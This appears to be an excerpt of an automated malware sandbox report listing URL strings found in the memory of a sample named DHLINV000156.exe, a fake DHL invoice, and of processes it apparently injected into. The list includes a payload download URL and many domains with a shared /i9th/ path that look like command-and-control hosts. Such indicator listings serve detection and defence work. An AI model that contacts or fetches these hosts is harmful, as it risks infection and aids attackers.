Source: explorer.exe, 0000000A.00000002.6924685409.0000000015466000.00000004.80000000.00040000.00000000.sdmp, colorcpl.exe, 0000000C.00000002.6890151620.0000000007150000.00000004.00000800.00020000.00000000.sdmp, colorcpl.exe, 0000000C.00000002.6887012764.0000000005C06000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://dinggubd.net
Source: explorer.exe, 0000000A.00000002.6924685409.00000000155F8000.00000004.80000000.00040000.00000000.sdmp, colorcpl.exe, 0000000C.00000002.6887012764.0000000005D98000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://hot6s.com/i9th/?YM=e0G7KvvSnXpGXx
Source: DHLINV000156.exe, 00000008.00000001.2368782551.0000000000649000.00000020.00000001.01000000.00000006.sdmp	String found in binary or memory: http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.
Source: DHLINV000156.exe, 00000008.00000002.3257887473.0000000003138000.00000004.00000020.00020000.00000000.sdmp, DHLINV000156.exe, 00000008.00000003.3131797147.000000000318B000.00000004.00000020.00020000.00000000.sdmp, DHLINV000156.exe, 00000008.00000003.3132927450.000000000318B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://nonsolopiercing.com/wp-content/vSvXWEFHsgTrbgVnnEpdo45.bin
Source: DHLINV000156.exe, 00000008.00000002.3257887473.0000000003138000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://nonsolopiercing.com/wp-content/vSvXWEFHsgTrbgVnnEpdo45.binN
Source: DHLINV000156.exe, 00000008.00000002.3258366023.000000000318B000.00000004.00000020.00020000.00000000.sdmp, DHLINV000156.exe, 00000008.00000003.3132388903.000000000318B000.00000004.00000020.00020000.00000000.sdmp, DHLINV000156.exe, 00000008.00000003.3131797147.000000000318B000.00000004.00000020.00020000.00000000.sdmp, DHLINV000156.exe, 00000008.00000003.3132927450.000000000318B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://nonsolopiercing.com/wp-content/vSvXWEFHsgTrbgVnnEpdo45.binv
Source: DHLINV000156.exe, 00000008.00000002.3257887473.0000000003138000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://nonsolopiercing.com/wp-content/vSvXWEFHsgTrbgVnnEpdo45.binystemR0
Source: DHLINV000156.exe	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: DHLINV000156.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: explorer.exe, 0000000A.00000000.3165590123.000000000D9ED000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3616659566.000000000D9ED000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%
Source: explorer.exe, 0000000A.00000000.3175026004.000000000FBE1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.6914647937.000000000FBDD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0:
Source: DHLINV000156.exe, 00000002.00000003.1951686037.00000000028ED000.00000004.00000020.00020000.00000000.sdmp, DHLINV000156.exe, 00000002.00000003.1950649705.00000000028EA000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000C.00000003.3404469472.0000000007598000.00000004.00000020.00020000.00000000.sdmp, maintenanceservice2.exe.2.dr, libpkcs11-helper-1.dll.2.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: DHLINV000156.exe, 00000002.00000003.1951686037.00000000028ED000.00000004.00000020.00020000.00000000.sdmp, DHLINV000156.exe, 00000002.00000003.1950649705.00000000028EA000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000C.00000003.3404469472.0000000007598000.00000004.00000020.00020000.00000000.sdmp, maintenanceservice2.exe.2.dr, libpkcs11-helper-1.dll.2.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: DHLINV000156.exe, 00000002.00000003.1951686037.00000000028ED000.00000004.00000020.00020000.00000000.sdmp, DHLINV000156.exe, 00000002.00000003.1950649705.00000000028EA000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000C.00000003.3404469472.0000000007598000.00000004.00000020.00020000.00000000.sdmp, maintenanceservice2.exe.2.dr, libpkcs11-helper-1.dll.2.dr	String found in binary or memory: http://ocsp.digicert.com0O
Source: explorer.exe, 0000000A.00000000.3140863853.00000000013A4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.6874670041.00000000013A4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/Omniroot2025.crl
Source: explorer.exe, 0000000A.00000000.3141798775.0000000001453000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.6874670041.0000000001453000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.msocsp.com0
Source: DHLINV000156.exe, 00000002.00000003.1944530759.00000000028ED000.00000004.00000020.00020000.00000000.sdmp, SolutionExplorerCLI.dll.2.dr	String found in binary or memory: http://ocsp.thawte.com0
Source: explorer.exe, 0000000A.00000002.6924685409.0000000015466000.00000004.80000000.00040000.00000000.sdmp, colorcpl.exe, 0000000C.00000002.6890151620.0000000007150000.00000004.00000800.00020000.00000000.sdmp, colorcpl.exe, 0000000C.00000002.6887012764.0000000005C06000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://push.zhanzhang.baidu.com/push.js
Source: explorer.exe, 0000000A.00000002.6924685409.000000001441E000.00000004.80000000.00040000.00000000.sdmp, colorcpl.exe, 0000000C.00000002.6879455716.00000000045D2000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000C.00000002.6887012764.0000000004BBE000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000D.00000002.3457016308.000000000B5DE000.00000004.80000000.00040000.00000000.sdmp, DHLINV000156.exe	String found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: explorer.exe, 0000000A.00000002.6924685409.000000001441E000.00000004.80000000.00040000.00000000.sdmp, colorcpl.exe, 0000000C.00000002.6879455716.00000000045D2000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000C.00000002.6887012764.0000000004BBE000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000D.00000002.3457016308.000000000B5DE000.00000004.80000000.00040000.00000000.sdmp, DHLINV000156.exe	String found in binary or memory: http://s.symcd.com06
Source: DHLINV000156.exe, 00000002.00000003.1944530759.00000000028ED000.00000004.00000020.00020000.00000000.sdmp, SolutionExplorerCLI.dll.2.dr	String found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
Source: DHLINV000156.exe, 00000002.00000003.1944530759.00000000028ED000.00000004.00000020.00020000.00000000.sdmp, SolutionExplorerCLI.dll.2.dr	String found in binary or memory: http://s2.symcb.com0
Source: explorer.exe, 0000000A.00000000.3158226868.000000000AD20000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000002.6880934450.00000000037F0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.3157646797.000000000A240000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: explorer.exe, 0000000A.00000002.6914473274.000000000F76E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.3171009246.000000000F76E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.microsoft.c
Source: DHLINV000156.exe, 00000002.00000003.1944530759.00000000028ED000.00000004.00000020.00020000.00000000.sdmp, SolutionExplorerCLI.dll.2.dr	String found in binary or memory: http://sv.symcb.com/sv.crl0f
Source: DHLINV000156.exe, 00000002.00000003.1944530759.00000000028ED000.00000004.00000020.00020000.00000000.sdmp, SolutionExplorerCLI.dll.2.dr	String found in binary or memory: http://sv.symcb.com/sv.crt0
Source: DHLINV000156.exe, 00000002.00000003.1944530759.00000000028ED000.00000004.00000020.00020000.00000000.sdmp, SolutionExplorerCLI.dll.2.dr	String found in binary or memory: http://sv.symcd.com0&
Source: explorer.exe, 0000000A.00000002.6924685409.000000001441E000.00000004.80000000.00040000.00000000.sdmp, colorcpl.exe, 0000000C.00000002.6879455716.00000000045D2000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000C.00000002.6887012764.0000000004BBE000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000D.00000002.3457016308.000000000B5DE000.00000004.80000000.00040000.00000000.sdmp, DHLINV000156.exe	String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: DHLINV000156.exe, 00000002.00000003.1944530759.00000000028ED000.00000004.00000020.00020000.00000000.sdmp, SolutionExplorerCLI.dll.2.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: explorer.exe, 0000000A.00000002.6924685409.000000001441E000.00000004.80000000.00040000.00000000.sdmp, colorcpl.exe, 0000000C.00000002.6879455716.00000000045D2000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000C.00000002.6887012764.0000000004BBE000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000D.00000002.3457016308.000000000B5DE000.00000004.80000000.00040000.00000000.sdmp, DHLINV000156.exe	String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: DHLINV000156.exe, 00000002.00000003.1944530759.00000000028ED000.00000004.00000020.00020000.00000000.sdmp, SolutionExplorerCLI.dll.2.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: DHLINV000156.exe, 00000002.00000003.1944530759.00000000028ED000.00000004.00000020.00020000.00000000.sdmp, SolutionExplorerCLI.dll.2.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: explorer.exe, 0000000A.00000002.6924685409.000000001441E000.00000004.80000000.00040000.00000000.sdmp, colorcpl.exe, 0000000C.00000002.6879455716.00000000045D2000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000C.00000002.6887012764.0000000004BBE000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000D.00000002.3457016308.000000000B5DE000.00000004.80000000.00040000.00000000.sdmp, DHLINV000156.exe	String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: explorer.exe, 0000000A.00000002.6914647937.000000000FA97000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.37123.vip
Source: explorer.exe, 0000000A.00000002.6914647937.000000000FA97000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.37123.vip/i9th/
Source: explorer.exe, 0000000A.00000002.6914647937.000000000FA97000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.37123.vip/i9th/www.37123.vip
Source: explorer.exe, 0000000A.00000002.6914647937.000000000FA97000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.37123.vipF20=_ng1IJ
Source: explorer.exe, 0000000A.00000002.6914647937.000000000FA97000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.adasoft.info
Source: explorer.exe, 0000000A.00000002.6914647937.000000000FA97000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.adasoft.info/i9th/
Source: explorer.exe, 0000000A.00000002.6914647937.000000000FA97000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.adasoft.info/i9th/www.adasoft.info
Source: explorer.exe, 0000000A.00000002.6914647937.000000000FA97000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.adasoft.infoF20=_ng1IJ
Source: explorer.exe, 0000000A.00000002.6914647937.000000000FA97000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.casinoenligne-france.info
Source: explorer.exe, 0000000A.00000002.6914647937.000000000FA97000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.casinoenligne-france.info/i9th/
Source: explorer.exe, 0000000A.00000002.6914647937.000000000FA97000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.casinoenligne-france.info/i9th/www.casinoenligne-france.info
Source: explorer.exe, 0000000A.00000002.6914647937.000000000FA97000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.casinoenligne-france.infoF20=_ng1IJ
Source: explorer.exe, 0000000A.00000002.6914647937.000000000FA97000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.cmproutdoors.com
Source: explorer.exe, 0000000A.00000002.6914647937.000000000FA97000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.cmproutdoors.com/i9th/
Source: explorer.exe, 0000000A.00000002.6914647937.000000000FA97000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.cmproutdoors.com/i9th/www.cmproutdoors.com
Source: explorer.exe, 0000000A.00000002.6914647937.000000000FA97000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.cmproutdoors.comF20=_ng1IJ
Source: explorer.exe, 0000000A.00000002.6914647937.000000000FA97000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.daon3999.net
Source: explorer.exe, 0000000A.00000002.6914647937.000000000FA97000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.daon3999.net/i9th/
Source: explorer.exe, 0000000A.00000002.6914647937.000000000FA97000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.daon3999.net/i9th/www.daon3999.net
Source: explorer.exe, 0000000A.00000002.6914647937.000000000FA97000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.daon3999.net8KC=R_sQOWT9q
Source: explorer.exe, 0000000A.00000002.6924685409.0000000015AAE000.00000004.80000000.00040000.00000000.sdmp, colorcpl.exe, 0000000C.00000002.6887012764.000000000624E000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://www.daon3999.net:80/i9th/?F20=_ng1IJ&YM=f7i/reR9z/XYtiufs4T2oCglTJHppPIhAuHFUSLntHIlLxYI6
Source: DHLINV000156.exe, 00000002.00000003.1951686037.00000000028ED000.00000004.00000020.00020000.00000000.sdmp, DHLINV000156.exe, 00000002.00000003.1950649705.00000000028EA000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000C.00000003.3404469472.0000000007598000.00000004.00000020.00020000.00000000.sdmp, maintenanceservice2.exe.2.dr, libpkcs11-helper-1.dll.2.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: explorer.exe, 0000000A.00000002.6914647937.000000000FA97000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.dinggubd.net
Source: explorer.exe, 0000000A.00000002.6914647937.000000000FA97000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.dinggubd.net/i9th/
Source: explorer.exe, 0000000A.00000002.6914647937.000000000FA97000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.dinggubd.net/i9th/www.dinggubd.net
Source: explorer.exe, 0000000A.00000002.6914647937.000000000FA97000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.dinggubd.netF20=_ng1IJ
Source: explorer.exe, 0000000A.00000000.3152133955.0000000009BE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.6889834307.0000000009BE0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.foreca.com
Source: explorer.exe, 0000000A.00000002.6914647937.000000000FA97000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.globaltourguide.org
Source: explorer.exe, 0000000A.00000002.6914647937.000000000FA97000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.globaltourguide.org/i9th/
Source: explorer.exe, 0000000A.00000002.6914647937.000000000FA97000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.globaltourguide.org/i9th/www.globaltourguide.org
Source: explorer.exe, 0000000A.00000002.6914647937.000000000FA97000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.globaltourguide.org8KC=R_sQOWT9q
Source: DHLINV000156.exe, 00000008.00000001.2368782551.0000000000649000.00000020.00000001.01000000.00000006.sdmp	String found in binary or memory: http://www.gopher.ftp://ftp.
Source: explorer.exe, 0000000A.00000002.6914647937.000000000FA97000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.hayuterce.com
Source: explorer.exe, 0000000A.00000002.6914647937.000000000FA97000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.hayuterce.com/i9th/
Source: explorer.exe, 0000000A.00000002.6914647937.000000000FA97000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.hayuterce.com/i9th/www.hayuterce.com
Source: explorer.exe, 0000000A.00000002.6914647937.000000000FA97000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.hayuterce.com8KC=R_sQOWT9q
Source: explorer.exe, 0000000A.00000002.6914647937.000000000FA97000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.hhkk143.cfd
Source: explorer.exe, 0000000A.00000002.6914647937.000000000FA97000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.hhkk143.cfd/i9th/
Source: explorer.exe, 0000000A.00000002.6914647937.000000000FA97000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.hhkk143.cfd/i9th/www.hhkk143.cfd
Source: explorer.exe, 0000000A.00000002.6914647937.000000000FA97000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.hhkk143.cfdF20=_ng1IJ
Source: explorer.exe, 0000000A.00000002.6914647937.000000000FA97000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.hot6s.com
Source: explorer.exe, 0000000A.00000002.6914647937.000000000FA97000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.hot6s.com/i9th/
Source: explorer.exe, 0000000A.00000002.6914647937.000000000FA97000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.hot6s.com/i9th/www.hot6s.com
Source: explorer.exe, 0000000A.00000002.6914647937.000000000FA97000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.hot6s.comF20=_ng1IJ
Source: DHLINV000156.exe, 00000008.00000001.2368782551.0000000000626000.00000020.00000001.01000000.00000006.sdmp	String found in binary or memory: http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD
Source: explorer.exe, 0000000A.00000002.6924685409.0000000014AFA000.00000004.80000000.00040000.00000000.sdmp, colorcpl.exe, 0000000C.00000002.6887012764.000000000529A000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://www.litespeedtech.com/error-page
Source: DHLINV000156.exe, 00000002.00000003.1944530759.00000000028ED000.00000004.00000020.00020000.00000000.sdmp, SolutionExplorerCLI.dll.2.dr	String found in binary or memory: http://www.nero.com
Source: explorer.exe, 0000000A.00000002.6914647937.000000000FA97000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.nortonseecurity.com
Source: explorer.exe, 0000000A.00000002.6914647937.000000000FA97000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.nortonseecurity.com/i9th/
Source: explorer.exe, 0000000A.00000002.6914647937.000000000FA97000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.nortonseecurity.com/i9th/www.nortonseecurity.com
Source: explorer.exe, 0000000A.00000002.6914647937.000000000FA97000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.nortonseecurity.com8KC=R_sQOWT9q
Source: explorer.exe, 0000000A.00000002.6914647937.000000000FA97000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.popcors.com
Source: explorer.exe, 0000000A.00000002.6914647937.000000000FA97000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.popcors.com/i9th/
Source: explorer.exe, 0000000A.00000002.6914647937.000000000FA97000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.popcors.com/i9th/www.popcors.com
Source: explorer.exe, 0000000A.00000002.6914647937.000000000FA97000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.popcors.comF20=_ng1IJ
Source: explorer.exe, 0000000A.00000002.6914647937.000000000FA97000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.sandyhillsagritourism.com
Source: explorer.exe, 0000000A.00000002.6914647937.000000000FA97000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.sandyhillsagritourism.com/i9th/
Source: explorer.exe, 0000000A.00000002.6914647937.000000000FA97000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.sandyhillsagritourism.com/i9th/www.sandyhillsagritourism.com
Source: explorer.exe, 0000000A.00000002.6914647937.000000000FA97000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.sandyhillsagritourism.comF20=_ng1IJ
Source: explorer.exe, 0000000A.00000002.6914647937.000000000FA97000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.sem-jobs.com
Source: explorer.exe, 0000000A.00000002.6914647937.000000000FA97000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.sem-jobs.com/i9th/
Source: explorer.exe, 0000000A.00000002.6914647937.000000000FA97000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.sem-jobs.com/i9th/www.sem-jobs.com
Source: explorer.exe, 0000000A.00000002.6914647937.000000000FA97000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.sem-jobs.comF20=_ng1IJ
Source: explorer.exe, 0000000A.00000002.6914647937.000000000FA97000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.spotcheck.site
Source: explorer.exe, 0000000A.00000002.6914647937.000000000FA97000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.spotcheck.site/i9th/
Source: explorer.exe, 0000000A.00000002.6914647937.000000000FA97000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.spotcheck.site/i9th/www.spotcheck.site
Source: explorer.exe, 0000000A.00000002.6914647937.000000000FA97000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.spotcheck.siteF20=_ng1IJ
Source: DHLINV000156.exe, 00000002.00000003.1944530759.00000000028ED000.00000004.00000020.00020000.00000000.sdmp, SolutionExplorerCLI.dll.2.dr	String found in binary or memory: http://www.symauth.com/cps0(
Source: DHLINV000156.exe, 00000002.00000003.1944530759.00000000028ED000.00000004.00000020.00020000.00000000.sdmp, SolutionExplorerCLI.dll.2.dr	String found in binary or memory: http://www.symauth.com/rpa00
Source: DHLINV000156.exe, 00000008.00000001.2368782551.00000000005F2000.00000020.00000001.01000000.00000006.sdmp	String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
Source: DHLINV000156.exe, 00000008.00000001.2368782551.00000000005F2000.00000020.00000001.01000000.00000006.sdmp	String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
Source: explorer.exe, 0000000A.00000002.6898139635.000000000B78B000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 0000000A.00000002.6914647937.000000000FA97000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.yeah-go.com
Source: explorer.exe, 0000000A.00000002.6898139635.000000000B78B000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 0000000A.00000002.6914647937.000000000FA97000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.yeah-go.com/i9th/
Source: explorer.exe, 0000000A.00000002.6914647937.000000000FA97000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.yeah-go.com/i9th/www.yeah-go.com
Source: colorcpl.exe, 0000000C.00000003.3401883899.0000000007495000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: explorer.exe, 0000000A.00000003.3626754747.000000000D651000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.3162334795.000000000D653000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp$
Source: DHLINV000156.exe, 00000002.00000003.1947032871.00000000028EA000.00000004.00000020.00020000.00000000.sdmp, System.Security.Cryptography.X509Certificates.dll.2.dr	String found in binary or memory: https://aka.ms/dotnet-warnings/
Source: explorer.exe, 0000000A.00000002.6890223405.0000000009D46000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.3153873762.0000000009D46000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/odirm
Source: explorer.exe, 0000000A.00000000.3165590123.000000000DA63000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3616659566.000000000DA63000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 0000000A.00000000.3165590123.000000000DA63000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3616659566.000000000DA63000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOSv
Source: explorer.exe, 0000000A.00000002.6902699355.000000000D60A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.3161433559.000000000D607000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 0000000A.00000002.6880980073.0000000003835000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 0000000A.00000000.3171166854.000000000FA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.6914647937.000000000FA10000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
Source: explorer.exe, 0000000A.00000000.3152133955.0000000009BE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.6889834307.0000000009BE0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=5696A836803C42E0B53F7BB2770E5342&timeOut=10000&o
Source: explorer.exe, 0000000A.00000002.6914473274.000000000F76E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.3152133955.0000000009BE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.6889834307.0000000009BE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.3171009246.000000000F76E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 0000000A.00000000.3153873762.0000000009E98000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.6890223405.0000000009E98000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.com
Source: explorer.exe, 0000000A.00000000.3152133955.0000000009BE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.6889834307.0000000009BE0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/svg/72/MostlySunnyDay.svg
Source: colorcpl.exe, 0000000C.00000003.3456433810.0000000007C80000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000C.00000003.3404469472.0000000007598000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%
Source: colorcpl.exe, 0000000C.00000003.3401883899.0000000007495000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: colorcpl.exe, 0000000C.00000003.3456433810.0000000007C80000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000C.00000003.3404469472.0000000007598000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crash-reports.mozilla.com/submit?id=
Source: DHLINV000156.exe, SolutionExplorerCLI.dll.2.dr	String found in binary or memory: https://d.symcb.com/cps0%
Source: DHLINV000156.exe, SolutionExplorerCLI.dll.2.dr	String found in binary or memory: https://d.symcb.com/rpa0
Source: explorer.exe, 0000000A.00000002.6924685409.000000001441E000.00000004.80000000.00040000.00000000.sdmp, colorcpl.exe, 0000000C.00000002.6879455716.00000000045D2000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000C.00000002.6887012764.0000000004BBE000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000D.00000002.3457016308.000000000B5DE000.00000004.80000000.00040000.00000000.sdmp, DHLINV000156.exe	String found in binary or memory: https://d.symcb.com/rpa0.
Source: colorcpl.exe, 0000000C.00000003.3401883899.0000000007495000.00000004.00000020.00020000.00000000.sdmp, AeL-0b1QRQ.12.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: colorcpl.exe, 0000000C.00000002.6890340919.0000000007503000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000C.00000003.3401883899.0000000007495000.00000004.00000020.00020000.00000000.sdmp, AeL-0b1QRQ.12.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: colorcpl.exe, 0000000C.00000003.3401883899.0000000007495000.00000004.00000020.00020000.00000000.sdmp, AeL-0b1QRQ.12.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
